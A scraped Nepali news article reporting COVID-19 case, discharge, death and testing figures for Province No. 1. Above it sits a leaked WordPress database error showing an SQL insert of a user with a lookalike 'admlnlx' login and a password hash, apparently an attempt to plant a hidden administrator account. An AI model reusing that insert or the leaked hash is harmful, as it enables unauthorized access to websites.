WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU9d77K3bJfWQZWAXeGV84rS1YRYGR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:21:34', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रदेश नं १ मा कोरोनाका सक्रिय सङ्क्रमितको सङ्ख्या ४१० जना रहेका छन् । सक्रिय सङ्क्रमितमध्ये ३९१ जना होमआइसोलेसनमा, नोबेल मेडिकल कलेजमा सात, विराट मेडिकल कलेजमा चार, बिपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठान र मेची अस्पतालमा तीन÷तीन, कोशी अस्पताल कोभिड–१९ उपचार केन्द्रमा दुई जना उपचारमा रहेको सामाजिक विकास मन्त्रालयले जनाएको छ ।
मन्त्रालयका तथ्याङ्क सङ्कलन तथा अनुगमन समितिका संयोजक डा रवीन्द्र निरौलाका अनुसार अस्पतालमा उपचारर्थमध्ये पाँच जना आइसियु र १४ जना सामान्य श्ययामा छन् । आजसम्म २९ हजार ९२८ सङ्क्रमितमध्ये २९ हजार ५६ डिस्चार्ज भएका छन् । सङ्क्रमण देखिएकामध्येबाट अहिलेसम्ममा ४६२ को मृत्यु भएको मन्त्रालयले जनाएको छ ।
पछिल्लो २४ घण्टामा २१४ जना डिस्चार्ज भएका छन् । होमआइसोलेसनबाट २०६, कोशी अस्पताल कोभिड–१९ उपचार केन्द्रबाट चार, बिपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठानबाट दुई, विराट मेडिकल कलेज र नोबेल मेडिकल कलेजबाट एक÷एक जना डिस्चार्ज भएका हुन् ।
पछिल्लो २४ घण्टाको अवधिमा १५ जना नयाँ सङ्क्रमित थपिएका छन् । थपिएकामा मोरङमा १० जनामध्ये विराटनगरमा सात, धनकुटाको धनकुटा नगरपालिकामा तीन र झापामा दुई जना छन् । हालसम्ममा प्रदेशमा दुई लाख १० हजार ७२५ जनाको पिसिआर परीक्षण भइसकेको मन्त्रालयले जनाएको छ ।